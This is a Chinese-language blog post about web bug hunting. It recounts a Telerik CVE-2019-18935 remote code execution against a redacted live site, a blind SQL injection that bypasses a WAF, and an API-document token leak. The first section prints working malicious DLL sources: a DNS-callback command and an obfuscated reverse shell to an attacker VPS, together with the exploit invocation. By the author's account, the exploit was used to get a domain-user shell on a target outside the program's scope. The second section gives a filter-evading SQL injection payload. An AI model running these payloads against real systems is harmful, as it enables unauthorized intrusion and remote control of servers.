记一次web漏洞挖掘随笔

Love The Way You Lie 2024-03-26 12:56 102阅读 0赞

最近挖了一些漏洞。虽然重复了，但是有参考价值。这边给大家分享下。

###  ###

漏洞重复还是很难受的，转念一想，人生从不是事事如人意的，漏洞重复忽略，不代表失败。先来后到很重要，出场顺序很重要。

**1.某站rce 忽略理由:不在范围内 作者神父&me 感谢神父带我**

测试域名:https://\*\*\*.\*\*\*:8089/

同时存在CVE-2017-11357 CVE-2019-18935 CVE-2017-9248漏洞

漏洞利用exp下载地址:

https://github.com/noperator/CVE-2019-18935  
　　https://github.com/noperator/CVE-2019-18935.git

*　　*延迟11s:sleep 11s:

测试代码: test.c

![复制代码][d25584ea9a1734415a2ade2617ec534b.png]

#include <windows.h>
    #include <stdio.h>
    
    BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
    {
        if (fdwReason == DLL_PROCESS_ATTACH)
            //Sleep(10000);  // Time interval in milliseconds.
            Sleep(11000);
        return TRUE;
    }
    
    
    test.c编译成amd642.dll文件

![复制代码][294c48b88e9b7f32b682e0b0c6d15e86.png]

运行:python CVE-2019-18935.py -v 2017.1.228 -p payloads\\amd642.dll -u https://\*\*\*.\*\*\*\*:8089/Telerik.Web.UI.WebResource.axd?type=rau

![25e7eb70f0441d3bef6f3bebb388c469.png][]

![f61084e352b6f8803cb2fccf232b3d92.png][]

第一步验证成功，成功延迟11s左右，原始请求2s

测试命令执行:

![复制代码][73a5e7f367185f37fab365c6a045bb39.png]

#include <windows.h>
    #include <stdio.h>
    
    BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
    {
        if (fdwReason == DLL_PROCESS_ATTACH)
            system("cmd.exe /c nslookup rsmwe.dnslog.cn");
    system("cmd.exe /c nslookup 2pstpep28u6vl9qrw0lhjwsr9if83x.burpcollaborator.net");
        return TRUE;
    }

test.c编译成amd642.dll文件

![复制代码][3d79a5c5f594bc7be6847da9c30e1ac8.png]

再次运行查看dnslog:

![0b51cf25913eedd897e33dc86f8bb4a5.png][]

直接反弹shell，通用exp:

![复制代码][82552791637f74305abb6f94cc4098e3.png]

#include <winsock2.h>
    #include <stdio.h>
    #include <windows.h>
    
    #pragma comment(lib, "ws2_32")
    
    #define HOST "{vps ip}"
    #define PORT {port}
    
    WSADATA wsaData;
    SOCKET Winsock;
    SOCKET Sock;
    struct sockaddr_in hax;
    char aip_addr[16];
    STARTUPINFO ini_processo;
    PROCESS_INFORMATION processo_info;
    
    // Adapted from https://github.com/infoskirmish/Window-Tools/blob/master/Simple%20Reverse%20Shell/shell.c
    void ReverseShell()
    {
        WSAStartup(MAKEWORD(2, 2), &wsaData);
        Winsock=WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
        
        struct hostent *host = gethostbyname(HOST);
        strcpy(aip_addr, inet_ntoa(*((struct in_addr *)host->h_addr)));
        
        hax.sin_family = AF_INET;
        hax.sin_port = htons(PORT);
        hax.sin_addr.s_addr = inet_addr(aip_addr);
        
        WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);
        if (WSAGetLastError() == 0) {
    
            memset(&ini_processo, 0, sizeof(ini_processo));
    
            ini_processo.cb = sizeof(ini_processo);
            ini_processo.dwFlags = STARTF_USESTDHANDLES;
            ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;
    
            char *myArray[4] = { "cm", "d.e", "x", "e" };
            char command[8] = "";
            snprintf(command, sizeof(command), "%s%s%s%s", myArray[0], myArray[1], myArray[2], myArray[3]);
            CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &ini_processo, &processo_info);
        }
    }
    
    DWORD WINAPI MainThread(LPVOID lpParam)
    {
        ReverseShell();
        return 0;
    }
    
    BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) 
    {
        HANDLE hThread;
    
        if (fdwReason == DLL_PROCESS_ATTACH)
            hThread = CreateThread(0, 0, MainThread, 0, 0, 0);
    
        return TRUE;
    }

![复制代码][d0427f44a35cc4520c1ac710020c76df.png]

权限不低，是域用户:

![b60686b3ab445e4f1b512e0fd1996359.png][]

**2.sql注入:**

**背景介绍:朋友发来一个注入，这个注入还挺棘手的，有xx云的waf，并且后端过滤了逗号，单双引号以及常规函数等。　　**

我的思路很简单，十六进制。regexp函数即可，我觉得应该还有别的思路

(case+when+current_user+regexp+0x*+then+1+else+2*1e308+end)

这样就把数据库user搞出来了。

这里我想说下case when这个语句，case when语句比我们想象的要灵活的多，这里做下笔记说下:

最常见的:

![68bf9ce2bca79f3c508ebecf1225f127.png][]

说点不常见的，我写两个demo，可以一直套娃下去:

case 1=1 when 2=2 then 1=1 else 1/0 end

![6cabe0dc09867b4dac7736b60046055d.png][]

![9c1b5056063c0eb88cab141d06ec6bd3.png][]

3.**url跳转+身份认证token泄漏:**

**　　**我昨天晚上挖的，忽略理由是重复。有时候对某些厂商还挺无语的，漏洞在那边，不修复。让我有种错觉，发现漏洞，有种踩到蜜罐的错觉。

资产范围是:vc-\*.xxx.com

其实遇到这种范围，我还挺开心的，因为我可以Fuzz下，简单Fuzz了下，发现不少资产。

挨个打开看，访问:vc-ss.xxx.com，访问站点，直接跳转要求登录。

我不是神仙，我也没账号，我看着js，没发现可访问的路径信息。

开始fuzz，知道是php就很好办了。使用ffuf跑php/api字典，跑到了一个接口开发文档/api/\*\*\*.html

接口开发文档设计本意是好的，但是大多数的接口开发文档上的截图信息/接口信息都可能有被二次漏洞利用风险。虽然截图信息都是明文，但是很不幸的是测试了下，发现几乎所有的接口，直接访问都是401，需要身份认证。些许无奈了，想放弃的时候，总是告诉自己，坚持看完看仔细。继续盯着接口文档一直翻来翻去，发现了一个身份token泄漏和其他一些安全漏洞。

整理漏洞提交了，早上就收到了重复的消息:

![44c6469e5d1eeaa4ca504a94eede9be6.png][]

原文链接： [https://www.cnblogs.com/piaomiaohongchen/p/17130283.html][https_www.cnblogs.com_piaomiaohongchen_p_17130283.html]

[d25584ea9a1734415a2ade2617ec534b.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/8d5fee3ef5034059b17c539643ac0237.png
[294c48b88e9b7f32b682e0b0c6d15e86.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/2370bab2bcfc4e3cb76c20e916f48dd7.png
[25e7eb70f0441d3bef6f3bebb388c469.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/978426b83964473f96e8719de8bed907.png
[f61084e352b6f8803cb2fccf232b3d92.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/82ff1660737b4c2dbbc0f477e7e423b8.png
[73a5e7f367185f37fab365c6a045bb39.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/f015eaa4251945628c57317a9c756f9f.png
[3d79a5c5f594bc7be6847da9c30e1ac8.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/8ba66bc17b4143bd9f08dc619ca1c415.png
[0b51cf25913eedd897e33dc86f8bb4a5.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/57656395615249ee94952ddadaaa7489.png
[82552791637f74305abb6f94cc4098e3.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/55b1f3eb69414333955d66bb1e88ed23.png
[d0427f44a35cc4520c1ac710020c76df.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/09fe271cab6242fca44438b9af4ccac4.png
[b60686b3ab445e4f1b512e0fd1996359.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/7d19b0e0e4644fa28fb4b355aeda2f58.png
[68bf9ce2bca79f3c508ebecf1225f127.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/a2ebba524bc24553a4976370226612cd.png
[6cabe0dc09867b4dac7736b60046055d.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/308cefc69b554d83beb65ce1cadff360.png
[9c1b5056063c0eb88cab141d06ec6bd3.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/a49d57685c1040939a70c1fa01952e2d.png
[44c6469e5d1eeaa4ca504a94eede9be6.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/a983c0a34b734fc9b720bdf0be384fef.png
[https_www.cnblogs.com_piaomiaohongchen_p_17130283.html]: https://www.cnblogs.com/piaomiaohongchen/p/17130283.html